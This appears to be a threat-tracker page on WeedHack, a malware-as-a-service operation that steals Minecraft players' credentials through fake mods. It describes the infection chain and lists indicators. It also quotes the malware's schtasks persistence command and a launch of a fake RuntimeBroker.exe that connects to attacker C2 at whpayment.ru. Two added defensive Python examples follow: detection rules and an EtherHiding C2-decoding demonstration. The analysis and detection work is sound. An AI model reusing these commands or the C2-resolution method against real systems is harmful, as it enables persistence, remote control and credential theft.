WeedHack
WeedHack is a Minecraft-focused malware-as-a-service (MaaS) operation active since at least January 2026 that targets Minecraft players by disguising malware as mods, clients, cheats, and related utilities. It has been distributed primarily through YouTube-promoted downloads and search-engine poisoning, using fake Minecraft-themed sites and trojanized JAR files; reporting cited more than 240 distribution URLs, 3,820 unique malicious JAR files, and approximately 116,464 impacted systems, with the highest prevalence in the United States, Germany, India, and the United Kingdom.
The platform is hosted on the clear net and provides a dashboard for operators or customers to view stolen data, monitor victims, and build payloads. The free tier functions as an infostealer, stealing Minecraft session IDs, browser cookies and saved passwords, credentials from Discord, Steam, and Telegram, and cryptocurrency wallet data; reporting also states it targets 36 browsers, 56 browser-based crypto wallets, and 12 desktop crypto wallets, and can capture screenshots. The premium tier, advertised at $5 per month or $24.99 lifetime, adds remote-access capabilities including screen sharing and remote control, webcam access, keylogging, reverse shell execution, and file upload/download or file-management functions.
McAfee reporting describes a four-stage infection chain. Stage 1 is delivered as a Minecraft-themed Java archive; it relaunches itself via javaw.exe, reads an identifier from fabric.api.json, decrypts a list of Ethereum JSON-RPC endpoints, and uses EtherHiding (C2 data read from a smart contract on the Ethereum blockchain through those endpoints) to retrieve the current C2 information, verifying the RSA signature on the response before downloading the next stage. Stage 2 is protected with JNIC obfuscation, performs a CMSTP-based UAC bypass, adds Windows Defender exclusions, performs host reconnaissance, steals browser and Discord data, and downloads Stage 3. Stage 3 establishes persistence via a registry Run key and a scheduled task, expands the Defender exclusions, and downloads Stage 4. Stage 4 deploys the Windows payloads: RuntimeBroker.exe for remote desktop and webcam access (the file name matches the legitimate Windows binary in System32, so the path rather than the name is the tell), Telemetry.exe as an infostealer targeting Telegram and cryptocurrency wallet data, and chromedriver.dll as a browser credential stealer; the associated scripts are WinDefConfig.cmd for Defender exclusions, Updater.vbs for persistence, and elv.vbs for the UAC bypass.
Known infrastructure and indicators mentioned in the reporting include dashboard or related domains such as weedhack.to, whpayment.ru, whack.cy, whtempdomain.com, whreceiverrrrrrrrr.ru, whrc.ru, whnewreceive.ru, and weedhack.xyz; telemetrydata.to as a destination for stolen data; the Telegram channel hxxps://t.me/+pw_g24ajDcQwMmYy; and McAfee detections including Trojan:Win/Weedhack.AA, Trojan:Win/Weedhack.AB, Trojan:Win/Weedhack.AC, Trojan:Win/Weedhack.AD, Trojan:Win/Weedhack.AE, and Trojan:Script/Weedhack.AF. Reporting also notes many apparent customers were teenagers or young adults using the malware for account theft, harassment, monitoring, and cyberbullying.
Techniques & procedures
27 distinct techniques documented for this family, grouped by tactic. The headings below are the tracker's own labels and only loosely follow ATT&CK tactic names (for example, Stealth and Defense Impairment rather than Defense Evasion).
Resource Development
1 technique
The WeedHack malware is distributed through malicious Minecraft-related mods, clients, and utilities promoted via YouTube and search engine poisoning.
Initial Access
1 technique
These videos target specific Minecraft keywords and place download links in both the description and in the comment section for more visibility.
Execution
6 techniques
Then it creates a scheduled task entry using this command.
schtasks /Create /TN "JavaSecurityUpdater" /SC ONLOGON /TR "C:\Users\admin\AppData\Roaming\Microsoft\SecurityUpdates\Updater.vbs" /RL HIGHEST /IT /F
WeedHack also offers a premium tier for $5/month... that adds remote control with input access (mouse and keyboard), webcam access, keylogger, remote shell, and remote file management.
Start-Process -FilePath 'C:\Users\admin\AppData\Roaming\RuntimeBroker.exe' -ArgumentList '--server wss://remotev2.whpayment.ru/ws/client ...' -WindowStyle Hidden
Next, the malware drops and executes ‘WinDefConfig.cmd’ from the temp folder.
This instruction executes a VBS script ... which silently relaunches the Stage 2 payload via 'javaw.exe'
The WeedHack malware is distributed through malicious Minecraft-related mods, clients, and utilities... The campaign utilizes over 240 distribution URLs and 3,820 unique malicious JAR files.
Persistence
3 techniques
Then it creates a scheduled task entry using this command.
schtasks /Create /TN "JavaSecurityUpdater" /SC ONLOGON /TR "C:\Users\admin\AppData\Roaming\Microsoft\SecurityUpdates\Updater.vbs" /RL HIGHEST /IT /F
This jar file creates a run key registry entry using the following code.
Privilege Escalation
2 techniques
Then it creates a scheduled task entry using this command.
schtasks /Create /TN "JavaSecurityUpdater" /SC ONLOGON /TR "C:\Users\admin\AppData\Roaming\Microsoft\SecurityUpdates\Updater.vbs" /RL HIGHEST /IT /F
Stealth
3 techniques
Stage 2 and the subsequent JAR payloads, namely Stage 3 and Stage 4, are protected using JNIC... This tool also provides a strong string obfuscation feature, which is also used by Weedhack to hinder analysis.
Weedhack has been active since January 2026 and masquerades as genuine Minecraft clients and mods to infect users.
Next, the malware performs the UAC bypass by leveraging CMSTP. It creates the following Windows INF installation script in the temp folder and executes it via "cmstp.exe".
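The process-level behaviours quoted in the Execution, Persistence, Privilege Escalation and Stealth sections above (a logon task created with /RL HIGHEST whose action is a .vbs under AppData, cmstp.exe fed an INF from the temp folder, Defender exclusions being added, a VBS host relaunching javaw.exe, and RuntimeBroker.exe started from AppData\Roaming with a wss:// server argument) can be hunted as a small rule set over process-creation telemetry. The following is an added example written for this page, not McAfee's or Mallory's code: it runs those rules over constructed Sysmon-style JSON lines that mirror the quoted commands. The Add-MpPreference exclusion command, the cmstp /ni /s switches, and the file names setup.inf and stage2.jar are assumptions; the page does not show the exact exclusion command or INF name. The last rule generalises slightly beyond the page by flagging any Java process that spawns a system utility directly, since every Stage 2 action originates from the trojanized JAR.

```python
"""Hunt WeedHack's quoted stage-2/3 behaviours in process-creation telemetry.

Added example for this page (not vendor or project code). Events are
constructed Sysmon Event ID 1 records flattened to JSON lines; they mirror
the commands quoted on the page but are not real captures.
"""
import json
import re
from typing import Callable, Dict, List

# Constructed sample telemetry. Lines 0-4 mirror the page's quoted behaviour;
# lines 5-6 are benign look-alikes that the rules must NOT flag.
# Assumed details: the Add-MpPreference exclusion command (the page only says
# "adds Windows Defender exclusions"), the cmstp "/ni /s" switches, and the
# file names setup.inf and stage2.jar.
SAMPLE_EVENTS = r'''
{"Image": "C:\\Windows\\System32\\schtasks.exe", "ParentImage": "C:\\Windows\\System32\\cmd.exe", "CommandLine": "schtasks /Create /TN \"JavaSecurityUpdater\" /SC ONLOGON /TR \"C:\\Users\\admin\\AppData\\Roaming\\Microsoft\\SecurityUpdates\\Updater.vbs\" /RL HIGHEST /IT /F"}
{"Image": "C:\\Windows\\System32\\cmstp.exe", "ParentImage": "C:\\Program Files\\Java\\bin\\javaw.exe", "CommandLine": "cmstp.exe /ni /s C:\\Users\\admin\\AppData\\Local\\Temp\\setup.inf"}
{"Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "ParentImage": "C:\\Windows\\System32\\cmd.exe", "CommandLine": "powershell -Command Add-MpPreference -ExclusionPath 'C:\\Users\\admin\\AppData\\Roaming'"}
{"Image": "C:\\Users\\admin\\AppData\\Roaming\\RuntimeBroker.exe", "ParentImage": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "CommandLine": "C:\\Users\\admin\\AppData\\Roaming\\RuntimeBroker.exe --server wss://remotev2.whpayment.ru/ws/client"}
{"Image": "C:\\Program Files\\Java\\bin\\javaw.exe", "ParentImage": "C:\\Windows\\System32\\wscript.exe", "CommandLine": "javaw.exe -jar C:\\Users\\admin\\AppData\\Local\\Temp\\stage2.jar"}
{"Image": "C:\\Windows\\System32\\RuntimeBroker.exe", "ParentImage": "C:\\Windows\\System32\\svchost.exe", "CommandLine": "C:\\Windows\\System32\\RuntimeBroker.exe -Embedding"}
{"Image": "C:\\Windows\\System32\\schtasks.exe", "ParentImage": "C:\\Windows\\System32\\msiexec.exe", "CommandLine": "schtasks /Create /TN \"GoogleUpdateTaskMachineUA\" /SC DAILY /TR \"C:\\Program Files (x86)\\Google\\Update\\GoogleUpdate.exe /ua\" /F"}
'''


def _base(path: str) -> str:
    """Lower-cased file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def schtasks_highest_to_appdata_script(ev: dict) -> bool:
    """Persistence: a task created with /RL HIGHEST whose action is a script under AppData."""
    cmd = ev["CommandLine"]
    return (_base(ev["Image"]) == "schtasks.exe"
            and re.search(r"/create\b", cmd, re.I) is not None
            and re.search(r"/rl\s+highest", cmd, re.I) is not None
            and re.search(r'/tr\s+"?[^"]*\\appdata\\[^"]*\.(vbs|js|cmd|bat|ps1|jar|exe)', cmd, re.I) is not None)


def cmstp_inf_from_temp(ev: dict) -> bool:
    """Privilege escalation: cmstp.exe consuming an INF that lives in a temp directory."""
    cmd = ev["CommandLine"].lower()
    return _base(ev["Image"]) == "cmstp.exe" and ".inf" in cmd and "\\temp\\" in cmd


def defender_exclusion_added(ev: dict) -> bool:
    """Defense impairment: a Defender exclusion added from the command line (assumed cmdlet)."""
    cmd = ev["CommandLine"].lower()
    return "add-mppreference" in cmd and "-exclusion" in cmd


def runtimebroker_outside_system32(ev: dict) -> bool:
    """Masquerading: the legitimate RuntimeBroker.exe lives only in C:\\Windows\\System32."""
    img = ev["Image"].lower()
    return _base(img) == "runtimebroker.exe" and not img.startswith("c:\\windows\\system32\\")


def script_host_relaunches_java(ev: dict) -> bool:
    """Execution: wscript/cscript (the dropped VBS) starting javaw.exe, the Stage 2 relaunch."""
    return _base(ev["ParentImage"]) in {"wscript.exe", "cscript.exe"} and _base(ev["Image"]) == "javaw.exe"


LOLBINS = {"cmstp.exe", "schtasks.exe", "powershell.exe", "cmd.exe", "wscript.exe", "reg.exe"}


def java_spawns_lolbin(ev: dict) -> bool:
    """Execution: a Java process (the trojanized JAR) launching a system utility directly."""
    return _base(ev["ParentImage"]) in {"javaw.exe", "java.exe"} and _base(ev["Image"]) in LOLBINS


RULES: Dict[str, Callable[[dict], bool]] = {
    "persistence.schtasks_highest_to_appdata_script": schtasks_highest_to_appdata_script,
    "privesc.cmstp_inf_from_temp": cmstp_inf_from_temp,
    "defense_impairment.defender_exclusion_added": defender_exclusion_added,
    "masquerading.runtimebroker_outside_system32": runtimebroker_outside_system32,
    "execution.script_host_relaunches_java": script_host_relaunches_java,
    "execution.java_spawns_lolbin": java_spawns_lolbin,
}


def evaluate(event: dict) -> List[str]:
    """Names of every rule that fires on one process-creation event."""
    return [name for name, rule in RULES.items() if rule(event)]


def scan(jsonl: str) -> Dict[int, List[str]]:
    """Map event index -> matched rule names for every event that fires at least one rule."""
    hits: Dict[int, List[str]] = {}
    for i, line in enumerate(l for l in jsonl.splitlines() if l.strip()):
        matched = evaluate(json.loads(line))
        if matched:
            hits[i] = matched
    return hits


if __name__ == "__main__":
    for idx, names in scan(SAMPLE_EVENTS).items():
        print(f"event {idx}: {', '.join(names)}")
```

The rules key on parent/child relationships and paths rather than on the task name or domain, so they survive the operator renaming JavaSecurityUpdater or rotating whpayment.ru; the two benign events (the real RuntimeBroker.exe and a vendor updater task) stay silent.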
Defense Impairment
1 technique
Credential Access
3 techniques
A premium tier, available for $5 per month or a $24.99 lifetime purchase, adds features like remote control, webcam access, and keylogging.
The MaaS platform, hosted on the clear net, offers a free tier that steals Minecraft session IDs, browser cookies, saved passwords, and credentials from various applications.
Discovery
3 techniques
The next command ... is used to scan and display nearby Wi-Fi networks, which could allow threat actors to infer victim location and classify the network type.
The first set of commands ... are used to collect host information, namely the OS name, CPU and GPU details, and the total RAM.
It can search for files using 24 different keywords.
Collection
3 techniques
A premium tier, available for $5 per month or a $24.99 lifetime purchase, adds features like remote control, webcam access, and keylogging.
Along with this, the sample takes a screenshot of the victim’s screen
Command and Control
5 techniques
This sample is responsible for the remote desktop and webcam access ... Start-Process ... RuntimeBroker.exe ... '--server wss://remotev2.whpayment.ru/ws/client'
Recommendations for VPN and residential proxy services with setup instructions.
Once the signature is verified, the malware contacts the C2 server to fetch the Stage 2 payload. This payload is downloaded as raw bytes and is unpacked entirely in memory.
A premium tier, available for $5 per month or a $24.99 lifetime purchase, adds features like remote control, webcam access, and keylogging.
This campaign deploys EtherHiding, a technique that uses Ethereum blockchain to fetch its latest C2 domain.
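EtherHiding, named in the summary and in this Command and Control section, keeps the current C2 location in a smart contract that the implant reads with an Ethereum JSON-RPC eth_call; a public RPC endpoint answers with an ABI-encoded string, so the outbound traffic looks like ordinary blockchain API use rather than a beacon to a suspicious domain. The following is an added example for this page, not McAfee's or WeedHack's code: it builds the eth_call request a defender would see on the wire and decodes an ABI-encoded string return value, exercised against a constructed response carrying the wss:// server address quoted above. The contract address, function selector, RPC URL and response are placeholders (the reporting does not publish them), and the RSA signature check the reporting describes on the fetched record is not reproduced here.

```python
"""Decode an EtherHiding-style C2 record fetched via Ethereum eth_call.

Added example for this page (not vendor or malware code). Everything runs
offline: the RPC response is constructed, and the contract address, selector
and RPC URL are placeholders, not WeedHack's real values.
"""
import json

# Placeholders, NOT the campaign's real infrastructure.
RPC_URL = "https://rpc.example.invalid/"
CONTRACT = "0x" + "11" * 20          # 20-byte contract address (placeholder)
SELECTOR = "0x20965255"              # 4-byte function selector (placeholder)

# The server address quoted on this page, wrapped in a constructed response.
C2_WSS = "wss://remotev2.whpayment.ru/ws/client"


def build_eth_call(contract: str, selector: str, request_id: int = 1) -> dict:
    """JSON-RPC body the implant would POST to a public Ethereum endpoint.

    This is the on-the-wire artefact: a POST whose JSON method is eth_call
    and whose 'to' field is a fixed contract address, from a game-client host.
    """
    return {
        "jsonrpc": "2.0",
        "id": request_id,
        "method": "eth_call",
        "params": [{"to": contract, "data": selector}, "latest"],
    }


def encode_abi_string(s: str) -> str:
    """ABI-encode a single dynamic `string` return value: offset word, length word, padded data."""
    data = s.encode("utf-8")
    padded = data + b"\x00" * (-len(data) % 32)
    return "0x" + (32).to_bytes(32, "big").hex() + len(data).to_bytes(32, "big").hex() + padded.hex()


def decode_abi_string(result_hex: str) -> str:
    """Inverse of encode_abi_string with bounds checks, so a malformed or truncated
    contract answer raises instead of yielding garbage."""
    raw = bytes.fromhex(result_hex[2:] if result_hex.lower().startswith("0x") else result_hex)
    if len(raw) < 64 or len(raw) % 32:
        raise ValueError("result is not a well-formed sequence of 32-byte ABI words")
    offset = int.from_bytes(raw[:32], "big")
    if offset + 32 > len(raw):
        raise ValueError("offset word points past the buffer")
    length = int.from_bytes(raw[offset:offset + 32], "big")
    body = raw[offset + 32:offset + 32 + length]
    if len(body) != length:
        raise ValueError("string body truncated")
    return body.decode("utf-8")


def extract_c2(response_text: str) -> str:
    """Pull the C2 string out of a raw eth_call JSON-RPC response."""
    resp = json.loads(response_text)
    if "error" in resp:
        raise ValueError(f"RPC error: {resp['error']}")
    return decode_abi_string(resp["result"])


# Constructed response, as the RPC endpoint would return it for the call above.
SAMPLE_RESPONSE = json.dumps({"jsonrpc": "2.0", "id": 1, "result": encode_abi_string(C2_WSS)})


if __name__ == "__main__":
    print(json.dumps(build_eth_call(CONTRACT, SELECTOR)))
    print("decoded C2:", extract_c2(SAMPLE_RESPONSE))
```

Two consequences for defenders follow from the request shape: blocking the C2 domain does nothing until the contract is also updated, because the implant re-reads the address on each run, and the useful network indicator is a non-browser process issuing eth_call POSTs to Ethereum RPC hosts, not the RPC hosts themselves.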
Other
1 technique
IOCs tracked for this family
118 indicators attributed across vendor reports, sandbox runs, and researcher write-ups.
Recent activity
7 sources tracked across advisories, community write-ups, and news.
WeedHack is a malware-as-a-service operation targeting Minecraft players via trojanized mods, clients, and utilities. Its free tier steals Minecraft session IDs, browser cookies, saved passwords, and credentials from applications, while its premium tier adds remote control, webcam access, and keylogging.
WeedHack is a multi-stage malware campaign distributed via trojanized JAR files, particularly masquerading as Minecraft-related mods/clients. The staged infection chain drops components including a remote access backdoor (RuntimeBroker.exe), an infostealer payload (Telemetry.exe), a browser credential stealer (chromedriver.dll), persistence and UAC-bypass scripts, and uses WeedHack-branded dashboard infrastructure for operator control.
WeedHack is a malware-as-a-service platform targeting Minecraft players via fake mods, cheats, clients, and tools. Its free version steals Minecraft sessions, browser cookies and saved passwords, cryptocurrency wallet data, and credentials from Discord, Steam, and Telegram, and can take screenshots. The paid version adds remote control, webcam access, keylogging, reverse shell, and file-management capabilities.
WeedHack is a malware-as-a-service platform targeting Minecraft users via malicious mods, clients, and utilities distributed through YouTube and SEO poisoning. Its free tier includes infostealing capabilities targeting Minecraft session IDs, browser credentials, cookies, cryptocurrency wallets, and messaging/gaming credentials, while premium tiers add remote-access features such as webcam access, keystroke logging, reverse shell execution, screen sharing, and file transfer.